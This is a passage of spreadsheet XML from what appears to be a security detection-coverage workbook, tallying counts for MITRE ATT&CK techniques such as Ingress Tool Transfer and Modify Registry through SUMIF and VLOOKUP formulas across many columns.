        <v>1</v>
      </c>
      <c r="CG25" s="13">
        <v>1</v>
      </c>
      <c r="CH25" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:86" ht="15" customHeight="1">
      <c r="A26" s="4">
        <f t="shared" si="13"/>
        <v>24</v>
      </c>
      <c r="B26" s="4" t="str">
        <f>IFERROR(VLOOKUP(A26,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1105</v>
      </c>
      <c r="C26" s="493" t="str">
        <f>IFERROR(VLOOKUP(B26,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="D26" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B26)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E26" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F26" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G26" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>6</v>
      </c>
      <c r="H26" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I26" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (6)</v>
      </c>
      <c r="J26" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M26" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>4</v>
      </c>
      <c r="N26" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O26" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (4)</v>
      </c>
      <c r="P26" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>2</v>
      </c>
      <c r="Q26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>4</v>
      </c>
      <c r="S26" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>10</v>
      </c>
      <c r="T26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>7</v>
      </c>
      <c r="U26" s="4" t="str">
        <f t="shared" si="2"/>
        <v>7 (10)</v>
      </c>
      <c r="V26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>4</v>
      </c>
      <c r="Y26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>4</v>
      </c>
      <c r="AA26" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (7)</v>
      </c>
      <c r="AB26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC26" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>11</v>
      </c>
      <c r="AF26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>9</v>
      </c>
      <c r="AG26" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (11)</v>
      </c>
      <c r="AH26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>7</v>
      </c>
      <c r="AI26" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>18</v>
      </c>
      <c r="AL26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>13</v>
      </c>
      <c r="AM26" s="322" t="str">
        <f t="shared" si="5"/>
        <v>13 (18)</v>
      </c>
      <c r="AN26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>10</v>
      </c>
      <c r="AO26" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>5</v>
      </c>
      <c r="AQ26" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR26" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS26" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT26" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY26" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ26" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA26" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC26" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>10</v>
      </c>
      <c r="BD26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>7</v>
      </c>
      <c r="BE26" s="4" t="str">
        <f t="shared" si="8"/>
        <v>7 (10)</v>
      </c>
      <c r="BF26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI26" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ26" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK26" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL26" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO26" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ26" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (6)</v>
      </c>
      <c r="BR26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS26" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT26" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU26" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B26,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV26" s="292">
        <v>2</v>
      </c>
      <c r="BW26" s="322">
        <v>2</v>
      </c>
      <c r="BX26" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY26" s="12">
        <v>1</v>
      </c>
      <c r="BZ26" s="13">
        <v>1</v>
      </c>
      <c r="CA26" s="394">
        <v>2</v>
      </c>
      <c r="CB26" s="288">
        <v>4</v>
      </c>
      <c r="CC26" s="4">
        <v>4</v>
      </c>
      <c r="CD26" s="4" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE26" s="4">
        <v>1</v>
      </c>
      <c r="CF26" s="4">
        <v>1</v>
      </c>
      <c r="CG26" s="13">
        <v>1</v>
      </c>
      <c r="CH26" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:86" ht="15" customHeight="1">
      <c r="A27" s="4">
        <f t="shared" si="13"/>
        <v>25</v>
      </c>
      <c r="B27" s="4" t="str">
        <f>IFERROR(VLOOKUP(A27,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1112</v>
      </c>
      <c r="C27" s="493" t="str">
        <f>IFERROR(VLOOKUP(B27,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Modify Registry</v>
      </c>
      <c r="D27" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B27)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E27" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>15</v>
      </c>
      <c r="F27" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (15)</v>
      </c>
      <c r="G27" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H27" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I27" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J27" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M27" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N27" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O27" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P27" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S27" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1</v>
      </c>
      <c r="T27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U27" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>11</v>
      </c>
      <c r="Z27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>5</v>
      </c>
      <c r="AA27" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (11)</v>
      </c>
      <c r="AB27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC27" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>28</v>
      </c>
      <c r="AF27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>20</v>
      </c>
      <c r="AG27" s="322" t="str">
        <f t="shared" si="4"/>
        <v>20 (28)</v>
      </c>
      <c r="AH27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>18</v>
      </c>
      <c r="AI27" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>4</v>
      </c>
      <c r="AK27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>39</v>
      </c>
      <c r="AL27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>25</v>
      </c>
      <c r="AM27" s="322" t="str">
        <f t="shared" si="5"/>
        <v>25 (39)</v>
      </c>
      <c r="AN27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>23</v>
      </c>
      <c r="AO27" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>4</v>
      </c>
      <c r="AQ27" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR27" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS27" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT27" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY27" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ27" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA27" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC27" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2</v>
      </c>
      <c r="BD27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE27" s="4" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BF27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI27" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ27" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK27" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL27" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN27" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO27" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>11</v>
      </c>
      <c r="BP27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>10</v>
      </c>
      <c r="BQ27" s="4" t="str">
        <f t="shared" si="10"/>
        <v>10 (11)</v>
      </c>
      <c r="BR27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS27" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT27" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU27" s="394">
